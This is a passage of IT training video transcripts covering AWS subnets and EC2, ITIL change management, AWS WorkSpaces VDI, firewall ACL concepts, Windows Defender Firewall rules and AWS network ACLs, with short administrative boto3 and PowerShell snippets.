mask, that's perfect. Let's go ahead and create that, it loved it. So I'm going to close that.
[Video description begins] He clicks a button called "Create" and further clicks a button called
"Close". [Video description ends]
And we can now see that we've got VPC2_Subnet. We can see the address range, and we can even see the
available IPv4 addresses. You might say, well, mathematically, with a subnet like this where you've got the
entire last octet to address hosts, you would have either 256 addresses, if you could use every binary
combination, or more commonly 254 once you exclude the network and broadcast addresses. Why only 251
available? Because Amazon Web Services reserves a few IP addresses in every subnet for internal use (the first
four addresses and the last one), and 256 minus 5 leaves 251. So this is normal in this particular case. So at this
point we can start deploying resources; let's say we were to deploy a new virtual machine. I'll go back to
the AWS main page.
[Video description begins] He switches back to the AWS Management Console web page. [Video description
ends]
Under All services, Compute, I'll click EC2, that's for virtual machine instances.
[Video description begins] The corresponding page opens. [Video description ends]
[Video description begins] He clicks an option called "Instances" in the navigation pane and the
corresponding page opens. [Video description ends]
I'll just quickly step through this to the point where I'm just going to keep clicking Next till we get to step
three.
[Video description begins] He clicks a button called "Launch Instance" and a page called "Step 1: Choose an
Amazon Machine Image (AMI)" opens. [Video description ends]
This is where we determine the network into which we want this resource deployed.
[Video description begins] He clicks a button called "Select" adjacent to an option called "Amazon Linux 2
AMI (HVM), SSD Volume Type". A page called "Step 2: Choose an Instance Type" opens. [Video description
ends]
[Video description begins] He clicks a button called "Next: Configure Instance Details". A page called "Step
3: Configure Instance Details" opens. [Video description ends]
That's VPC2_Subnet. And the setting for that subnet is to disable the autoassignment of public IPs.
[Video description begins] He clicks a drop-down list box called "Network" and selects an option called "vpc-
0ade256b9d107cd09 | VPC2". [Video description ends]
I could just override that here and enable that if I wanted to. But the point is, we can now deploy cloud
resources into our newly created VPC subnet.
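The same deployment can also be scripted; here is a minimal sketch, again assuming boto3, with a hypothetical AMI ID and subnet ID, that launches an instance directly into the new subnet and overrides the subnet's public IP auto-assignment setting, as discussed above.

import boto3

# Sketch: launch an EC2 instance into a specific VPC subnet.
# The AMI ID and subnet ID are hypothetical placeholders.
ec2 = boto3.client("ec2", region_name="us-east-1")

response = ec2.run_instances(
    ImageId="ami-0123456789abcdef0",   # for example, an Amazon Linux 2 AMI in your region
    InstanceType="t2.micro",
    MinCount=1,
    MaxCount=1,
    NetworkInterfaces=[{
        "DeviceIndex": 0,
        "SubnetId": "subnet-0abc1234def567890",   # the VPC2_Subnet created earlier
        "AssociatePublicIpAddress": True,          # override the subnet's default of no public IP
    }],
)

print("Launched:", response["Instances"][0]["InstanceId"])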
In this video, you will identify how ITIL influences efficient service delivery, including change management
implementation.
Objectives
identify how ITIL influences efficient service delivery, including change management implementation
[Video description begins] Topic title: Change Management Procedures. The presenter is Dan
Lachance. [Video description ends]
Information Technology Infrastructure Library or ITIL is an IT service management best practice framework.
It answers questions such as, how does IT fit in to provide the best value in achieving business goals? Overall,
in a general sense, you could say that ITIL helps improve the quality and reliability of IT services. It also
means having effective IT practices that are efficient from a cost perspective and affect the bottom line in a
positive way. The ITIL Lifecycle includes service strategy and service design. Service strategy would include
things like financial and demand management, and that would be related to a business process that has
underlying IT services supporting it. It also includes business relationship management and service
automation. Service design would deal with things like service catalog management, having a catalog of
services that are available, which would even include cloud self-provisioning.
That means having the capacity and availability to supply solutions that are requested from the catalog.
Service design also includes service continuity, disaster recovery planning, and incident response plans. Next,
we have the service transition and service operation phases in the ITIL Lifecycle. Service transition would
include things like change management, so going through the correct procedures, steps, and authorizations
before implementing a change, which is really the focus of what we're going to talk about.
Then there's release and deployment management, and service testing to ensure a service meets business and
operational requirements. Service operation means monitoring, over time, the health and performance metrics
related to an IT solution, and managing incidents when they occur. That means having an incident response
plan in place ahead of time. It also means fulfilling any requests for IT services. Finally, we have continual
service improvement. This means measuring service performance metrics and availability continuously.
There's a continual assessment and then continuous improvement based on the results of that assessment. This
is similar to the way we need continuous monitoring, or at the very least periodic monitoring, of security
controls to ensure their effectiveness at mitigating threats. So change management is all about controlling risk
and minimizing any potential disruptions if there's a problem while the change is being implemented. With
change management, we need to have standardized procedures for implementing specific types of changes.
By doing this and by testing them thoroughly, we're reducing the risk related to the implementation of those IT
changes. And increasing the efficiency at which they take place. At the same time, we might also be directed in
our standard procedures for change management by compliance with laws and regulations. The other thing to
consider is a reduction of IT related downtime. Everybody wants zero downtime. That's not always possible.
But at least a reduction of the downtime and proper notification of stakeholders prior to the downtime is
something that we can do. So the focus here is on the process related to implementing the change, not
necessarily the change itself. It's about how it would be done. Because if you have a standardized process for
change management, it really doesn't matter what the change is. You'll be controlling it, going through the
proper approval levels to make sure you minimize risk.
So what are some types of IT changes? It could be at the hardware level, could be to software. It could be
changes to procedures, how we do something. Remember there's a continuous monitoring and continuous
improvement part of the ITIL Lifecycle. The changes might be applied at the network level, such as changing a
DHCP option that gets delivered to clients on the network.
[Video description begins] Change Management Event Flow. [Video description ends]
Now, the event flow for change management begins with a change request. Often this is done through a web
portal by an IT service technician or a department lead. Next, the change is evaluated. After it's approved, then
the change can be implemented and reviewed after the fact.
[Video description begins] The Change Management Event flow contains Change request creation, Change
request evaluation, Change request approval, and Change implementation and review. [Video description
ends]
Configuration management usually modifies what's already there, and it requires a configuration management
system, or CMS. The CMS consists of at least one configuration management database, or CMDB, which in
turn contains one or many configuration items, or CIs. An example of a CI within a CMDB might be a record
that states we have 100 licenses for a software product. That can be compared against a scan and software
inventory of what's actually out there, to see whether we're in compliance based on the number of licenses
purchased.
So configuration management then has defined responsibilities for the tasks related to it just like change
management would. There is a verification of configuration item validity. Remember, in our example a
configuration item might be a record stating we have 100 licenses purchased for a piece of software. So
ensuring that that's correct. And then of course, having documentation for how changes were implemented.
This is always important, and it feeds into continuous improvement, in this case for configuration
management.
After completing this video, you will be able to recognize the benefits of virtual desktop infrastructure.
Objectives
[Video description begins] Topic title: Virtual Desktop Infrastructure. The presenter is Dan Lachance. [Video
description ends]
Many decades ago, computer environments often included dumb terminals that would have a connection to a
centralized host, which had the horsepower to run the user sessions.
[Video description begins] Virtual Desktop Infrastructure (VDI). [Video description ends]
And in a way, we've come full circle with Virtual Desktop Infrastructure, VDI. VDI centrally hosts desktops
that you just connect to over the network from a variety of devices, even thin devices, devices that have almost
no processing power and maybe not even any local storage, because it's all handled server side. So it allows
for remote client connectivity.
In our diagram, we see on the left a smartphone. This is an end user thin client device. The user could be using
a web browser or a small app that they've installed from an app store to allow connectivity to their desktop, for
example, in the cloud VDI infrastructure. So in the cloud, we can configure centrally hosted Linux or
Windows desktops. This allows the IT team to have centralized control of the configuration of the software in
the cloud, and also of the permission sets that might be applied, determining what users can and cannot do.
Updating is also all centralized, as opposed to deploying updates to hundreds or thousands of computers that
actually have the entire software suite installed.
[Video description begins] Topic title: Cloud VDI Configuration. The presenter is Dan Lachance. [Video
description ends]
In this demonstration, I'll be configuring virtual desktop infrastructure or VDI in the Amazon Web Services
cloud. This will allow centralized Linux or Windows desktops that are managed and exist in the cloud to be
accessible to end user client devices. So how do we do this?
[Video description begins] A web page called "AWS Management Console" opens. [Video description ends]
Well, here in the AWS Management Console, I'm going to start by searching for WorkSpaces. That's what the
feature's called in AWS.
[Video description begins] He clicks a link called "WorkSpaces" and a page called "WorkSpaces"
opens. [Video description ends]
So first, I have to make the configuration here. Now, currently, we don't have any WorkSpaces. But if I go to
Directories, it's important that we have a directory service registered.
[Video description begins] He clicks an option called "Directories" in the navigation pane and the
corresponding page opens. [Video description ends]
I've got an Active Directory configuration here in Amazon Web Services, which is going to be used for user
authentication. And the domain is called quick24x7.local. But notice, under Registered it says, No. So having
this selected, I'm going to go to the Actions menu and choose Register.
[Video description begins] A dialog box called "Register directory d-906771189a" opens. [Video description
ends]
After which, I can specify the subnet affiliation for this, for availability. And down below, I'm not going to
change any of these items for Self Service Permissions or Amazon WorkDocs. I want those things both
enabled, so I'm going to go ahead and click Register.
[Video description begins] He clicks a button called "Register" and the dialog box closes. [Video description
ends]
Okay, it says REGISTERING and I can just click the refresh button here until such point that the registration
has completed. And it won't take long if you keep clicking the refresh button. So now, we can go over to
WorkSpaces.
[Video description begins] He clicks an option called "WorkSpaces" in the navigation pane and the
corresponding page opens. [Video description ends]
[Video description begins] A page called "Launch WorkSpaces" opens. It is divided into two parts. The first
part is a navigation pane and the second part is a content pane. The navigation pane contains the options
called "Step 1: Select Directory", "Step 2: Identify Users", "Step 3: Select Bundles", "Step 4: WorkSpaces
Configuration", and "Step 5: Review". The Step 1: Select Directory option is selected in the navigation pane
and the corresponding page is open in the content pane. [Video description ends]
[Video description begins] He clicks a button called "Next Step". The Step 2: Identify Users option is selected
in the navigation pane and the corresponding page is open in the content pane. [Video description ends]
I'm going to click Next Step, and I'm going to configure some Username details.
[Video description begins] He enters the text CBlackwell in a text box called "Username". [Video description
ends]
[Video description begins] He enters the text Blackwell in a text box called "Last Name". [Video description
ends]
So when I fill in the email for the account, it's going to create the account in my Active Directory domain here
in the cloud. I can click Create Users and keep adding multiple users to the list.
[Video description begins] He highlights the text "quick24X7.local". He clicks a button called "Create
Users". [Video description ends]
So down below, we've got our user listed, so I can click Next Step to proceed. And then I choose a bundle.
[Video description begins] He clicks a button called "Next Step". The Step 3: Select Bundles option is selected
in the navigation pane and the corresponding page is open in the content pane. [Video description ends]
The bundle, of course, is the collection of the operating system and app configuration for the user's desktop.
I'm going to choose Standard with Windows 10, which gives me 2 vCPUs, 4 GB of memory, a root volume,
and a user storage disk volume. So that's fine, I'm going to go ahead and use that. And then at the bottom right,
I'll click Next Step.
[Video description begins] He clicks a button called "Next Step". The Step 4: WorkSpaces Configuration
option is selected in the navigation pane and the corresponding page is open in the content pane. [Video
description ends]
Finally, on the last page here, we have a number of options. Do we always want the virtual desktop running, in
which case you're going to be billed for that, or should it Auto Stop after a certain period of time? I'm going to
leave it on Auto Stop after one hour. We can determine if we want to protect data at rest for the root and user
data volumes. And we can also add tags. I'm not going to add any tagging, so at the bottom right, I'm going to
click Next Step.
[Video description begins] He clicks a button called "Next Step". The Step 5: Review option is selected in the
navigation pane and the corresponding page is open in the content pane. [Video description ends]
[Video description begins] He clicks a button called "Launch WorkSpaces". The WorkSpaces page is
displayed. [Video description ends]
After a moment, we can see a message that our WorkSpace is being launched. We can see it listed down
below, but the Status is PENDING. So we're going to wait here and click on the refresh button until the Status
changes.
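If you prefer scripting over the console, the boto3 SDK exposes WorkSpaces operations as well; the following sketch is a rough equivalent of the wizard steps above, where the bundle ID is a hypothetical placeholder and the directory ID and username are the ones used in this demonstration.

import boto3

# Sketch: launch an Amazon WorkSpace with the Auto Stop running mode.
# The BundleId is a hypothetical placeholder; DirectoryId and UserName come from the demo.
ws = boto3.client("workspaces", region_name="us-east-1")

result = ws.create_workspaces(
    Workspaces=[{
        "DirectoryId": "d-906771189a",
        "UserName": "CBlackwell",
        "BundleId": "wsb-0123456789abcdef",   # e.g. a Standard with Windows 10 bundle
        "WorkspaceProperties": {
            "RunningMode": "AUTO_STOP",
            "RunningModeAutoStopTimeoutInMinutes": 60,
        },
    }]
)

# Requests that could not be launched are reported separately in FailedRequests.
print("Pending:", [w["WorkspaceId"] for w in result["PendingRequests"]])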
[Video description begins] Topic title: Cloud VDI Client Connections. The presenter is Dan Lachance. [Video
description ends]
Amazon WorkSpaces is a virtual desktop infrastructure or VDI solution in the AWS Cloud. It allows users to
use a thin client to connect to a centralized desktop that's hosted in the cloud. The desktop can be running
Windows or Linux, and users can connect from a Chromebook, an iPad, an Android phone, a Mac, or a
Windows device; it doesn't matter. And so when that's set up in Amazon Web Services, an email message will
be sent to whoever was associated with a specific WorkSpace or virtual desktop.
[Video description begins] He opens the Outlook and points to the email labeled "Your Amazon
WorkSpace". [Video description ends]
And this is what the email message looks like. It says it's your Amazon WorkSpace, and it talks about how to
complete the user profile and download the WorkSpaces client by following a link, then launching the client
and entering the registration code specified here in the email, and then logging in with our user account. Now
this user account was specified when the WorkSpace was defined in Amazon Web Services. So I'm going to
go ahead and follow that link.
[Video description begins] A new web page opens and a dialog box called "Please set your WorkSpaces
credentials" is open. [Video description ends]
Now when I follow the link, it prompts the user to enter a password. So I'm going to go ahead and enter a new
password and then confirm it. So I'm going to go ahead and click the Update User button.
[Video description begins] A page called "amazon WorkSpaces" opens. [Video description ends]
And at this point, I am taken to a page where I can download the appropriate WorkSpaces client for my
platform. So in this case, I'm going to download it for Windows.
[Video description begins] He clicks a button called "Download" under an option called "Windows". [Video
description ends]
After you've downloaded and installed it, you'll be prompted to install any available updates.
[Video description begins] He clicks a button called "Install update". A wizard window called "Amazon
WorkSpaces Setup" opens. [Video description ends]
And I can just go ahead and accept the default settings for getting this update installed. And after a moment,
we're placed in our Amazon WorkSpace, and it's as if we're running Windows on premises when really it's
hosted in the AWS cloud.
Upon completion of this video, you will be able to list how different types of firewalls protect digital assets.
Objectives
[Video description begins] Topic title: Firewalls. The presenter is Dan Lachance. [Video description ends]
Firewalls remain an important technical control to limit what traffic is allowed into or out of hosts or networks,
depending on whether it's a host-based firewall or a perimeter-based firewall on the edge of the network. So
we're talking about controlling traffic flow, whether it's a hardware firewall appliance, which could be a
specialized device that you plug into the network, or firewall ACL rules built into a router. At the software
level, we could have OS-based firewalls, such as those built into the Windows platforms, or if you're using
Linux, you might be using a firewall like UFW or iptables. You could also have a virtual machine appliance
that's been tweaked and is dedicated to serving as a firewall.
Now, if that's the case, usually it'll have two network interfaces, two virtual network interfaces. You could also
have an SDN or Software-Defined Networking cloud-based firewall solution, such as a security group in the
Amazon Web Services cloud computing environment. So when you're looking at firewalls, one of
the things to think about are the layers of the OSI model that the firewall applies to. You'll recall that the OSI
model is a seven layer conceptual model that we map communications hardware and software to.
So if we say that we've got a layer 3 firewall, we're talking about a firewall that can work with layer 2
hardware MAC addresses for devices and layer 3 IP addresses. If it's a layer 4 firewall, it has the ability to also
look at port numbers such as within TCP or UDP headers. If it's a layer 7 firewall, it can even go down into the
packet payload to make decisions about whether that traffic should be allowed or not. Stateful firewalls are
ones that don't only look at individual packets one by one, such as those coming in from the Internet to an
internal network; instead, they look at a stream or session that relates numerous packets. A stateless firewall,
of course, just looks at individual packets one by one and doesn't see a relationship between the multiple
packets that comprise a session. So needless to say, a stateful firewall is more powerful and more precise about
allowing or denying traffic appropriately than a stateless firewall would be.
[Video description begins] Firewall Placement. [Video description ends]
Another important aspect of a firewall appliance is its placement, where is it? For example, in our diagram,
we've got the Internet at the top and an internal private network down at the bottom. Normally, in an enterprise
environment, we'll have a demilitarized zone, or a DMZ network. And in that network, we would place items
that should be publicly reachable. Things like web servers, or mail servers, or FTP servers. In the DMZ, we'll
also want to make sure that we have a firewall that controls traffic into it. So pictured on our diagram then, we
have three firewalls, one between the Internet and the DMZ.
Now, of course, there's also a firewall at the DMZ level and one at the private network level. So from the
Internet into the DMZ, the firewall rules might be a little bit more relaxed than they would be from the Internet
to the internal private network. So the placement is always going to be crucial when it comes to working with
network-based perimeter firewalls. Now technically, you should have a firewall on every computing device
where possible, including even smartphones. A firewall ACL is an access control list. It's a set of rules that
either determine that something is allowed or not allowed into a network or a host.
So there are many different components to a firewall rule, such as the direction, is it incoming or is it
outgoing? And not only that, but which interface does it apply to? What's the protocol type that we're allowing
or blocking? Maybe we're blocking ICMP traffic, which results from using commands such as traceroute and
ping, but we're going to allow IP traffic. Depending on the firewall, you might also be able to specify
additional higher level details. When we say a higher level, we're talking about higher levels in the OSI model.
So layers 5 through to 7, where we can look at things like usernames or device types, or IP addresses from
which connectivity is being established. And also the destination that someone is trying to reach.
[Video description begins] Inbound Firewall ACL Rules. [Video description ends]
The other thing to think about is what the ACL might look like. Here is an example, where in the leftmost
column, we've got the protocol, whether it's TCP, UDP, or Any to allow everything. Then we've got the port
number. Now, in some cases, you'll be able to specify both the source and the destination port, but usually it's
the destination port that matters. So for example, if you're hitting a secured web server over HTTPS, that's
TCP-based and you're looking at a target port of 443, while the source port from the client web browser would
be a high-numbered ephemeral port that's usually randomly generated.
In other words, it's not always going to be the same for every session. So here, we have port numbers. Next, we
have the source, where the connection is being initiated from, and we can limit that. And then the destination,
what are we trying to connect to in the end? And then we have a name for the rule and the action, whether it's
allow or deny. So in the first example, we're allowing UDP port 53 traffic from anywhere to a specific
destination; that would be for a DNS query.
[Video description begins] The Destination of UDP is 192.168.10.200. [Video description ends]
Second example, TCP 80, 443 from anywhere to a specific host, would allow HTTP and HTTPS traffic to that
IP address.
[Video description begins] The Destination of TCP is 192.168.10.201. [Video description ends]
Third rule, TCP 3389 from an IT_Admin_IP_Range would allow access to any RDP hosts, so Windows hosts
with RDP enabled, for remote management. And at the bottom, we have an Any rule whose action is Deny.
Firewall rules are parsed from the top down, and so if there are no matches in the first three rules, then the last
rule kicks in, which would block all traffic.
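To make the top-down, first-match parsing concrete, here is a small Python sketch of the same hypothetical rule table; real firewalls also match on source and destination addresses and ranges, but the evaluation order is the point being illustrated.

# Sketch: first-match, top-down evaluation of the example inbound ACL.
# Anything that matches no explicit rule falls through to the final deny.
RULES = [
    {"proto": "UDP", "port": 53,   "source": "any",               "action": "allow"},  # DNS
    {"proto": "TCP", "port": 80,   "source": "any",               "action": "allow"},  # HTTP
    {"proto": "TCP", "port": 443,  "source": "any",               "action": "allow"},  # HTTPS
    {"proto": "TCP", "port": 3389, "source": "IT_Admin_IP_Range", "action": "allow"},  # RDP
    {"proto": "any", "port": None, "source": "any",               "action": "deny"},   # default deny
]

def evaluate(proto, port, source):
    """Return the action of the first rule that matches, parsing top-down."""
    for rule in RULES:
        if (rule["proto"] in ("any", proto)
                and rule["port"] in (None, port)
                and rule["source"] in ("any", source)):
            return rule["action"]
    return "deny"

print(evaluate("TCP", 443, "198.51.100.7"))         # allow - matches the HTTPS rule
print(evaluate("TCP", 3389, "198.51.100.7"))        # deny  - source is not the admin range
print(evaluate("TCP", 3389, "IT_Admin_IP_Range"))   # allow - matches the RDP rule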
[Video description begins] Topic title: Windows Firewall. The presenter is Dan Lachance. [Video description
ends]
Ever since Windows XP Service Pack 2, Windows operating systems have included a built-in firewall. So to
get started here on Windows Server 2019, I'm going to go to my Start menu and type in the word fire. Now
from here, I want to go in and configure the Windows firewall on this device. And I'm going to do it first of all
by just clicking Windows Defender Firewall.
[Video description begins] A window called "Windows Defender Firewall" opens and a page called "Help
protect your PC with Windows Defender Firewall" is open. [Video description ends]
Now what we can do from here is see which type of network we are connected to, that's called network
profiling, and which one of our network profiles are applicable for firewall rules.
[Video description begins] He points to options labeled "Domain networks", "Private networks", and "Guest
or public networks". [Video description ends]
Now for example, let's say that I'm on a Guest or public network; it says Connected, and that's where we are.
Well, notice the Windows Defender Firewall state is currently set to Off, so it's not on there. It's not on for
private or domain networks either. A domain network is one where the machine detects it's got a connection to
an Active Directory domain controller, in which case the domain network profile would be selected. When you
build a firewall rule in Windows, you can determine whether the rule applies to one or all of these network
profiles. Now I want to turn Windows Defender Firewall on. So I'm going to click on that on the left and turn it
on for all of these different networks.
[Video description begins] He clicks a link called "Turn Windows Defender Firewall on or off" and the
corresponding page opens. [Video description ends]
[Video description begins] He selects the checkboxes called "Turn on Windows Defender Firewall" under the
sections labeled "Domain network settings", "Private network settings", and "Public network settings". [Video
description ends]
Now when I do that, I can determine how the behavior will be for the firewall. I don't want to block all
incoming connections, including what's allowed. In other words, block all incoming, allow outgoing. No, I
don't want to do that. I want to allow some traffic in, such as for remote management, so I'm not going to do
that. We can also turn on notifications when Windows Defender blocks an app. And you can do that for each
of the network profiles. I'm not going to do anything other than turn on Windows Defender Firewall, which is
important.
[Video description begins] He clicks a button called "OK". The Help protect your PC with Windows Defender
Firewall page opens. [Video description ends]
So now it turns green. We know that that is turned on. Now I can go into Advanced settings, which would have
been the same thing as me going into Windows Defender Firewall with Advanced Security from the Start
menu to begin with.
[Video description begins] He clicks a link called "Advanced settings" and a window called "Windows
Defender Firewall with Advanced Security" opens. It is divided into five parts. The first part is a menu bar.
The second part is a toolbar. The third part is a navigation pane. It includes options labeled "Inbound Rules"
and "Outbound Rules". The fourth part is a content pane. The fifth part is a pane called "Actions". [Video
description ends]
And I have both inbound as well as outbound rules. What you've got installed on your host will determine
which rules are present here.
[Video description begins] He clicks the Inbound Rules option in the navigation pane and the Inbound Rules
pane opens in the content pane. It includes a table with multiple rows and columns. The column headers
include Name, Group, and Profile. [Video description ends]
So the more software you install, the more extra little firewall rules you might expect to see. So to build a
firewall rule in Inbound Rules, I'm going to right-click on Inbound and choose New Rule.
[Video description begins] A wizard window called "New Inbound Rule Wizard" opens. A page called "Rule
Type" is open. It is divided into two parts. The first part is a navigation pane and the second part is a content
pane. [Video description ends]
Now I can base this rule on a Program. So, if that Program needs certain types of network connectivity, this
rule can either allow it or deny it. It can be based on a Port number, that's an OSI model layer 4 or transport
layer port number, such as port 80 for an HTTP web site, or port 25 for SMTP, that type of thing. Or it can be
Predefined, where the common services are listed. So, if you want to allow connectivity for DNS, DNS Service
is there. In my case, I want to allow connectivity for Remote Desktop.
[Video description begins] He clicks a drop-down list box called "Predefined" and selects an option called
"Remote Desktop". [Video description ends]
Now, I could have chosen Port and specified port 3389, which is what remote desktop protocol uses. But since
it's predefined, I might as well choose it from there.
[Video description begins] He clicks a button called "Next". A page called "Predefined Rules" opens. [Video
description ends]
And I'm going to select all of the rules for TCP and UDP, I'll click Next.
[Video description begins] A page called "Action" opens. [Video description ends]
And at this point in this firewall rule, I have to decide: do I want to allow the connection, block it, or only
allow it if it's secure? That's where IPsec or IP Security comes in. IPsec allows you to have a secured
connection at any level in the TCP/IP network environment. So you don't have to have a PKI certificate to, for
example, encrypt the connection like you would with an HTTPS web server. Here I'm going to click Allow the
connection and Finish.
[Video description begins] He clicks a button called "Finish". The wizard window closes. [Video description
ends]
And at the top of the list we can see the remote desktop rules that resulted from me selecting from the
predefined rule list.
[Video description begins] He points to the rules in the Inbound Rules pane. [Video description ends]
Now at any point in time, I can double-click to open up a rule, where the interface looks a little bit different,
and make a few changes.
[Video description begins] He double-clicks a rule labeled “Remote Desktop – User Mode (TCP - In)” under
the Name column header. A dialog box called "Remote Desktop -User Mode (TCP-In) Properties" opens. It
includes tabs labeled “Protocols and Ports”, “Scope”, “Advanced”, “Local Principals”, “Remote Users”,
“General”, “Programs and Services”, and “Remote Computers”. The General tab is open. [Video description
ends]
Now, if it's a predefined rule, it says here some of its properties cannot be modified, which is correct. For
example, whether or not we have this rule enabled, or whether we're allowing, allowing only if it's secure, or
blocking. And I can even specify remote computers, or remote users that would have to be logged in using
certain computers, before the rule would be applicable.
[Video description begins] He selects the Remote Computers tab. [Video description ends]
But if I say to only allow connections from certain computers, it says, well, you can only do that if you set the
authentication to allow only secure connections. That was back on the General tab down here: allow the
connection only if it's secure. We can also specify, under Scope, the IP addresses that are applicable, maybe to
limit where this rule will allow remote desktop traffic to come from or go to. We have a number of other items
we can specify, such as under Advanced, where we can say I only want this applicable on the domain network.
In other words, I don't want to allow inbound RDP when this machine is connected to any other type of
network.
[Video description begins] He clicks the Advanced tab. It includes a section called “Profiles” with checkboxes
labeled “Domain”, “Private”, and “Public”. He unchecks the Private and Public checkboxes. [Video
description ends]
Now, if this is a server, the chances of actually taking the server to another location are probably very slim,
especially if it's a virtual machine. So these options are really more applicable for Windows desktops or
laptops.
[Video description begins] He clicks a button called "Cancel" and the dialog box closes. [Video description
ends]
At any rate, once we've got this configured properly, we can even take all of those rules and configurations
and export the list so that we could use it on other hosts.
[Video description begins] He right-clicks the Inbound Rules option and points to an option called "Export
List". [Video description ends]
You can also configure this centrally in Group Policy for domain joined computers that have similar firewall
rule needs.
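For hosts that aren't managed through Group Policy, the same kind of inbound rule can also be scripted; here is a minimal sketch, assuming Python on an elevated Windows session, that shells out to the built-in New-NetFirewallRule PowerShell cmdlet to allow inbound RDP on the Domain profile only, similar to the rule configured above. The rule name is a hypothetical example.

import subprocess

# Sketch: add an inbound Windows Defender Firewall rule for RDP (TCP 3389),
# scoped to the Domain profile, via PowerShell. Requires an administrator session.
cmd = (
    "New-NetFirewallRule -DisplayName 'Allow RDP (Domain only)' "
    "-Direction Inbound -Protocol TCP -LocalPort 3389 "
    "-Action Allow -Profile Domain"
)

subprocess.run(["powershell", "-NoProfile", "-Command", cmd], check=True)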
During this video, you will learn how to configure an Amazon Web Services security group.
Objectives
[Video description begins] Topic title: Cloud Firewall Solutions. The presenter is Dan Lachance. [Video
description ends]
In the Amazon Web Services cloud environment, you can still configure firewall settings at the individual
virtual machine OS level.
[Video description begins] A web page called "AWS Management Console" opens. [Video description ends]
But alternatively, you can use cloud-based firewall solutions like security groups to protect traffic flow for
individual virtual machines, or network ACLs to control traffic flow for subnets in the cloud. Let's start here in
the AWS Management Console by going into the VPC Management Console, where we do all things
networking. And I'm going to scroll down here. First of all, let's take a look at Your VPCs.
[Video description begins] He clicks an option called "Your VPCs" in the navigation pane and the
corresponding page opens. [Video description ends]
And I've got a VPC here called VPC1. And, if I click on Subnets, we've got a number of subnets available.
[Video description begins] He clicks an option called "Subnets" in the navigation pane and the corresponding
page opens. [Video description ends]
So subnets 1, 2, and 3 within VPC1. You can associate a network ACL, or access control list, essentially a
firewall ruleset, with specific subnets. So I'm going to scroll down to Network ACLs, where I'll see any
existing ones.
[Video description begins] He clicks an option called "Network ACLs" in the navigation pane and the
corresponding page opens. It includes a table with five columns and one row. The column headers are
"Name", "Network ACL ID", "Associated with", "Default", and "VPC". [Video description ends]
[Video description begins] He clicks a button called "Create network ACL" and a page called "Create network
ACL" opens. [Video description ends]
[Video description begins] He enters the text AllowRemoteMgmt in a text box called "Name tag". [Video
description ends]
And I'm going to tie it to a particular VPC. In this case, VPC1, and I'm going to choose Create.
[Video description begins] He clicks a drop-down list box called VPC and selects an option called "vpc-
74a7a10d". [Video description ends]
So it shows up here AllowRemoteMgmt, but notice what we've not yet done is specified the actual firewall
rules themselves.
[Video description begins] He clicks a button called "Create" and the Create network ACL page
closes. [Video description ends]
Having a network ACL selected, down below I can view both the inbound and the outbound rules; the default
network ACL that was already there allows everything from anywhere.
[Video description begins] He selects AllowRemoteMgmt under the Name column header. In a section below
the table tabs labeled "Details", "Inbound Rules", "Outbound Rules", "Subnet associations", and "Tags" are
displayed. [Video description ends]
Having the newly created network ACL selected down below, I can click Inbound Rules, which denies all
traffic by default. And for Outbound Rules, it's denied as well. But we can edit these.
[Video description begins] He clicks the Inbound Rules tab and clicks a button called "Edit inbound rules". A
page called Edit inbound rules opens. [Video description ends]
So I can go to Inbound Rules and click Edit inbound rules and add a rule.
[Video description begins] He clicks a button called "Add Rule". [Video description ends]
For example, I'm going to add a rule number here, Rule 100. And I want to allow, in this case, SSH, remote
administration traffic, so it fills in the protocol number and the port number.
[Video description begins] He clicks a drop-down list box called "Type" and selects an option called "SSH
(22)". [Video description ends]
I can specify a source from where I want to allow this connection. 0.0.0.0/0 means from anywhere. Ideally,
you'll pop in an IP address there for a specific location from which you want to do your remote SSH
administration such as the public IP interface for a network that you administer from. Now with the network
ACL, we can either allow or deny the traffic. I'm going to allow that traffic, and I'm going to add another one.
[Video description begins] He clicks the Add Rule button. [Video description ends]
Rule 101, so Rule 101 gets checked only after Rule 100 is checked and doesn't have a match. In this case, I want to allow Remote Desktop Protocol or RDP for Windows remote management.
[Video description begins] He clicks the Type drop-down list box and selects an option called "RDP
(3389)". [Video description ends]
So again, it has filled in the protocol number of 6 for TCP. It's got the port number 3389. And again, this is going to be an allow rule from anywhere. So I'm just going to go ahead and save that.
[Video description begins] He clicks a button called "Save". [Video description ends]
Notice now that, because the rules are parsed by rule number from the top down, if we don't have a match with those two rules, then the default deny rule at the bottom kicks in.
[Video description begins] He clicks the Inbound Rules tab and clicks a button called "Edit outbound rules". A
page called Edit outbound rules opens. [Video description ends]
[Video description begins] He clicks the Add Rule button. He enters 100 under the Rule # column header. [Video description ends]
So, if I edit the outbound rules, we might want to add a rule number here to allow outbound traffic of a specific
type.
[Video description begins] He clicks the Type drop-down list box and selects an option called "All
Traffic". [Video description ends]
We could specify all traffic, so I could scroll through the list here and choose ALL Traffic, and we could allow
it, so I'm going to do that in an outbound direction.
[Video description begins] He clicks a button called "Save". [Video description ends]
Now the next thing we would do, still with the network ACL selected, is associate it with one or more subnets under the Subnet associations tab. From here, we can click the Edit subnet associations button and select a particular subnet of interest.
[Video description begins] A page called "Edit subnet association" opens. [Video description ends]
So let's say, I'm interested in using this for a particular subnet that I will select from the list.
[Video description begins] He clicks a button called "Edit" and the Edit subnet association page
closes. [Video description ends]
That means these inbound rules and outbound rules are applicable to the selected subnet and, of course, by extension, to any virtual machine instances, in AWS parlance, EC2 instances, that happen to be deployed in that subnet.
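If you prefer to script this instead of clicking through the console, the same kind of network ACL and rules can be created with the AWS SDK. What follows is a minimal sketch using Python and boto3, not the exact steps from the demo: the VPC ID echoes the one shown above, but treat it and the 0.0.0.0/0 source ranges as placeholders you would normally restrict to your own management network.

# Minimal sketch: create a network ACL and remote management rules with boto3.
# Assumptions: boto3 is installed, AWS credentials are configured, and the VPC ID
# below is a placeholder for your own VPC.
import boto3

ec2 = boto3.client("ec2")

acl = ec2.create_network_acl(VpcId="vpc-74a7a10d")
acl_id = acl["NetworkAcl"]["NetworkAclId"]

# Rule 100: allow inbound SSH (TCP 22). Ideally, narrow the CidrBlock to the
# public IP range you administer from instead of 0.0.0.0/0.
ec2.create_network_acl_entry(
    NetworkAclId=acl_id, RuleNumber=100, Protocol="6", RuleAction="allow",
    Egress=False, CidrBlock="0.0.0.0/0", PortRange={"From": 22, "To": 22})

# Rule 101: allow inbound RDP (TCP 3389); checked only if rule 100 does not match.
ec2.create_network_acl_entry(
    NetworkAclId=acl_id, RuleNumber=101, Protocol="6", RuleAction="allow",
    Egress=False, CidrBlock="0.0.0.0/0", PortRange={"From": 3389, "To": 3389})

# Outbound rule 100: allow all traffic ("-1" means all protocols).
ec2.create_network_acl_entry(
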